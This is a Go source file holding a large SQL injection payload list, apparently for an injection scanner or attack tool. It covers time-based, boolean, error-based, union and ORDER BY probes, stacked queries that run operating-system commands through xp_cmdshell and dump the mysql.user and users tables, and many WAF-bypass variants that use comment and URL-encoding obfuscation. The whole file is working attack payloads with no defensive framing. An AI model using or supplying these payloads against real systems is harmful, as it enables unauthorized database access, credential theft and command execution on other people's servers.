package payloads

var Heavy = PayloadGroup{
	DBMS: "Heavy",
	Payloads: []Payload{
		// ═══════════════════════════════════════════
		// ADVANCED TIME-BASED (Cross-DBMS)
		// ═══════════════════════════════════════════
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5) a JOIN (SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5) b JOIN (SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5) c)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM (SELECT 1)x JOIN (SELECT 1)y JOIN (SELECT 1)z JOIN (SELECT 1)w JOIN (SELECT 1)v)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM (SELECT 1)a,(SELECT 1)b,(SELECT 1)c,(SELECT 1)d,(SELECT 1)e,(SELECT 1)f)--"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT SLEEP(5) FROM DUAL),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "time", Content: "1' AND (SELECT 1 FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5) a, (SELECT 1 UNION SELECT 2) b, (SELECT 1 UNION SELECT 2) c)--"},
		{Type: "time", Content: "' AND (SELECT MAX(0) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) a, (SELECT 1 UNION SELECT 2) b)--"},
		{Type: "time", Content: "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--"},
		{Type: "time", Content: "' AND (SELECT * FROM (SELECT(SLEEP(10)))a)--"},
		{Type: "time", Content: "' AND (SELECT * FROM (SELECT(SLEEP(3)))a)--"},
		{Type: "time", Content: "' OR (SELECT * FROM (SELECT(SLEEP(5)))a)--"},
		{Type: "time", Content: "') OR SLEEP(5)--"},
		{Type: "time", Content: "')) OR SLEEP(5)--"},
		{Type: "time", Content: "') OR (SELECT * FROM (SELECT(SLEEP(5)))a)--"},
		{Type: "time", Content: "' OR SLEEP(5) OR '1'='1"},
		{Type: "time", Content: "\" OR SLEEP(5)--"},
		{Type: "time", Content: "\") OR SLEEP(5)--"},
		{Type: "time", Content: "\")) OR SLEEP(5)--"},
		{Type: "time", Content: "1' OR SLEEP(5)#"},
		{Type: "time", Content: "1' OR SLEEP(5)--"},
		{Type: "time", Content: "1') OR SLEEP(5)--"},
		{Type: "time", Content: "1\" OR SLEEP(5)--"},
		{Type: "time", Content: "1\") OR SLEEP(5)--"},
		{Type: "time", Content: "1' OR SLEEP(5) OR '1'='1"},
		{Type: "time", Content: "1\" OR SLEEP(5) OR \"1\"=\"1"},
		{Type: "time", Content: "' OR (SELECT COUNT(*) FROM GENERATE_SERIES(1,1000000)) > 0--"},

		// ═══════════════════════════════════════════
		// ADVANCED BOOLEAN (Cross-DBMS)
		// ═══════════════════════════════════════════
		{Type: "boolean", Content: "' AND '1'='1'--", Expected: "true"},
		{Type: "boolean", Content: "' AND '1'='2'--", Expected: "false"},
		{Type: "boolean", Content: "\" AND \"1\"=\"1\"--", Expected: "true"},
		{Type: "boolean", Content: "\" AND \"1\"=\"2\"--", Expected: "false"},
		{Type: "boolean", Content: "' AND 1=1 AND '%'='%", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=2 AND '%'='%", Expected: "false"},
		{Type: "boolean", Content: "' AND 1=1-- -", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=2-- -", Expected: "false"},
		{Type: "boolean", Content: "' AND 1=1#", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=2#", Expected: "false"},
		{Type: "boolean", Content: "') AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "') AND 1=2--", Expected: "false"},
		{Type: "boolean", Content: "')) AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "')) AND 1=2--", Expected: "false"},
		{Type: "boolean", Content: "1' AND 1=1 AND '1'='1", Expected: "true"},
		{Type: "boolean", Content: "1' AND 1=2 AND '1'='1", Expected: "false"},
		{Type: "boolean", Content: "\" AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "\" AND 1=2--", Expected: "false"},
		{Type: "boolean", Content: "1\" AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "1\" AND 1=2--", Expected: "false"},
		{Type: "boolean", Content: "' OR '1'='1", Expected: "true"},
		{Type: "boolean", Content: "' OR '1'='2", Expected: "false"},
		{Type: "boolean", Content: "' OR 1=1 OR '1'='1", Expected: "true"},
		{Type: "boolean", Content: "' OR 1=2 OR '1'='1", Expected: "false"},
		{Type: "boolean", Content: "1') AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "1') AND 1=2--", Expected: "false"},

		// ═══════════════════════════════════════════
		// ADVANCED ERROR-BASED (Cross-DBMS)
		// ═══════════════════════════════════════════
		{Type: "error", Content: "' AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2) a JOIN (SELECT 1 UNION SELECT 2) b)--"},
		{Type: "error", Content: "' AND (SELECT * FROM (SELECT 1)x JOIN (SELECT 2)y JOIN (SELECT 3)z)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1,COUNT(*),CONCAT((SELECT 1),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x) a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1,2,3,4,5,COUNT(*),CONCAT((SELECT 1),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x) a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1,COUNT(*) FROM INFORMATION_SCHEMA.TABLES GROUP BY CONCAT((SELECT 1),FLOOR(RAND()*2))) a)--"},
		{Type: "error", Content: "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(ROUND(RAND()*2),(SELECT 1))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x) a)--"},
		{Type: "error", Content: "1' AND (SELECT 1 FROM (SELECT 1,2,3,4,5,COUNT(*) FROM INFORMATION_SCHEMA.TABLES GROUP BY CONCAT((SELECT 1),FLOOR(RAND()*2))) a)--"},

		// ═══════════════════════════════════════════
		// ADVANCED UNION-BASED (Cross-DBMS)
		// ═══════════════════════════════════════════
		{Type: "union", Content: "1' UNION ALL SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "1' UNION ALL SELECT NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--"},
		{Type: "union", Content: "1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--"},
		{Type: "union", Content: "1\" UNION SELECT 1,2,3--"},
		{Type: "union", Content: "1\" UNION SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "') UNION SELECT 1,2,3--"},
		{Type: "union", Content: "') UNION SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "')) UNION SELECT 1,2,3--"},
		{Type: "union", Content: "')) UNION SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "\") UNION SELECT 1,2,3--"},
		{Type: "union", Content: "\")) UNION SELECT NULL,NULL,NULL--"},
		{Type: "orderBy", Content: "' ORDER BY 1--"},
		{Type: "orderBy", Content: "' ORDER BY 2--"},
		{Type: "orderBy", Content: "' ORDER BY 3--"},
		{Type: "orderBy", Content: "' ORDER BY 4--"},
		{Type: "orderBy", Content: "' ORDER BY 5--"},
		{Type: "orderBy", Content: "' ORDER BY 6--"},
		{Type: "orderBy", Content: "' ORDER BY 7--"},
		{Type: "orderBy", Content: "' ORDER BY 8--"},
		{Type: "orderBy", Content: "' ORDER BY 9--"},
		{Type: "orderBy", Content: "' ORDER BY 10--"},
		{Type: "orderBy", Content: "\" ORDER BY 1--"},
		{Type: "orderBy", Content: "\" ORDER BY 2--"},
		{Type: "orderBy", Content: "\" ORDER BY 3--"},
		{Type: "orderBy", Content: "\" ORDER BY 4--"},
		{Type: "orderBy", Content: "\" ORDER BY 5--"},
		{Type: "orderBy", Content: "\" ORDER BY 6--"},
		{Type: "orderBy", Content: "\" ORDER BY 7--"},
		{Type: "orderBy", Content: "\" ORDER BY 8--"},
		{Type: "orderBy", Content: "\" ORDER BY 9--"},
		{Type: "orderBy", Content: "\" ORDER BY 10--"},
		{Type: "orderBy", Content: "') ORDER BY 1--"},
		{Type: "orderBy", Content: "') ORDER BY 2--"},
		{Type: "orderBy", Content: "') ORDER BY 3--"},
		{Type: "orderBy", Content: "') ORDER BY 4--"},
		{Type: "orderBy", Content: "') ORDER BY 5--"},

		// ═══════════════════════════════════════════
		// ADVANCED STACKED QUERIES
		// ═══════════════════════════════════════════
		{Type: "stacked", Content: "'; SELECT * FROM users;--"},
		{Type: "stacked", Content: "'; EXEC xp_cmdshell('whoami');--"},
		{Type: "stacked", Content: "'; EXEC xp_cmdshell('dir C:\\');--"},
		{Type: "stacked", Content: "'; EXEC xp_cmdshell('ipconfig');--"},
		{Type: "stacked", Content: "'; SELECT pg_sleep(5);--"},
		{Type: "stacked", Content: "'; CREATE TABLE _tmp (id INT); INSERT INTO _tmp VALUES (1); DROP TABLE _tmp;--"},
		{Type: "stacked", Content: "'; SELECT * FROM pg_stat_activity;--"},
		{Type: "stacked", Content: "'; SHOW DATABASES;--"},
		{Type: "stacked", Content: "'; SHOW TABLES;--"},
		{Type: "stacked", Content: "'; SELECT * FROM mysql.user;--"},

		// ═══════════════════════════════════════════
		// ADVANCED WAF BYPASS
		// ═══════════════════════════════════════════
		{Type: "bypass", Content: "' OORR 1=1--"},
		{Type: "bypass", Content: "' AANDND 1=1--"},
		{Type: "bypass", Content: "' /*!12345AND*/ 1=1--"},
		{Type: "bypass", Content: "' 444e AND 1=1--"},
		{Type: "bypass", Content: "' AND 1=1-- "},
		{Type: "bypass", Content: "' AND 1=1--+"},
		{Type: "bypass", Content: "' AND 1=1 --+"},
		{Type: "bypass", Content: "1' AND 1=1--+"},
		{Type: "bypass", Content: "' AND 1=1-- -"},
		{Type: "bypass", Content: "' AND 1=1--%20"},
		{Type: "bypass", Content: "' AND 1=1--%09"},
		{Type: "bypass", Content: "' AND 1=1--%0a"},
		{Type: "bypass", Content: "' /**/AND/**/1=1/**/--"},
		{Type: "bypass", Content: "'%2F**%2FAND%2F**%2F1=1--"},
		{Type: "bypass", Content: "'%23%0aAND 1=1--"},
		{Type: "bypass", Content: "'%250aAND 1=1--"},
		{Type: "bypass", Content: "'%252f*%252fAND%252f*%252f1=1--"},
		{Type: "bypass", Content: "' UNION/*!12345SELECT*/1,2,3--"},
		{Type: "bypass", Content: "' UNION/**/SELECT/**/1,2,3--"},
		{Type: "bypass", Content: "' UNION%23%0aSELECT%23%0a1,2,3--"},
		{Type: "bypass", Content: "'/**/UNION/**/SELECT/**/1,2,3/**/--"},
		{Type: "bypass", Content: "1'/*!50000UNION*//*!50000SELECT*/1,2,3--"},
		{Type: "bypass", Content: "1' UN/**/ION SEL/**/ECT 1,2,3--"},
		{Type: "bypass", Content: "1' UN/**/ION/**/SELECT/**/1,2,3--"},
		{Type: "bypass", Content: "1' UniOn SeLeCt 1,2,3--"},
		{Type: "bypass", Content: "1' UNIoN ALL SeLeCT 1,2,3--"},
		{Type: "bypass", Content: "1'%09UNION%09SELECT%091,2,3--"},
		{Type: "bypass", Content: "1'%0aUNION%0aSELECT%0a1,2,3--"},
		{Type: "bypass", Content: "1'%0dUNION%0dSELECT%0d1,2,3--"},
		{Type: "bypass", Content: "1'/*!UNION*//*!SELECT*/1,2,3--"},
		{Type: "bypass", Content: "' OR 1=1-- -"},
		{Type: "bypass", Content: "' OR 1=1#"},
		{Type: "bypass", Content: "' OR 1=1/*"},
		{Type: "bypass", Content: "' OR 1=1;%00"},
		{Type: "bypass", Content: "' OR 1=1--%00"},
		{Type: "bypass", Content: "' OR '1'='1'--"},
		{Type: "bypass", Content: "' OR '1'='1'#"},
		{Type: "bypass", Content: "' OR '1'='1'/*"},
		{Type: "bypass", Content: "' OR '1'='1'--%00"},
		{Type: "bypass", Content: "1' OR '1'='1'--"},
		{Type: "bypass", Content: "1' OR '1'='1'#"},
		{Type: "bypass", Content: "' OR 1=1 /*"},
		{Type: "bypass", Content: "' OR 1=1-- /*"},
		{Type: "bypass", Content: "' OR 1=1-- - /*"},
		{Type: "bypass", Content: "' /*!50000OR*/ 1=1--"},
		{Type: "bypass", Content: "' /*!12345OR*/ 1=1--"},
		{Type: "bypass", Content: "' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--"},
	},
}
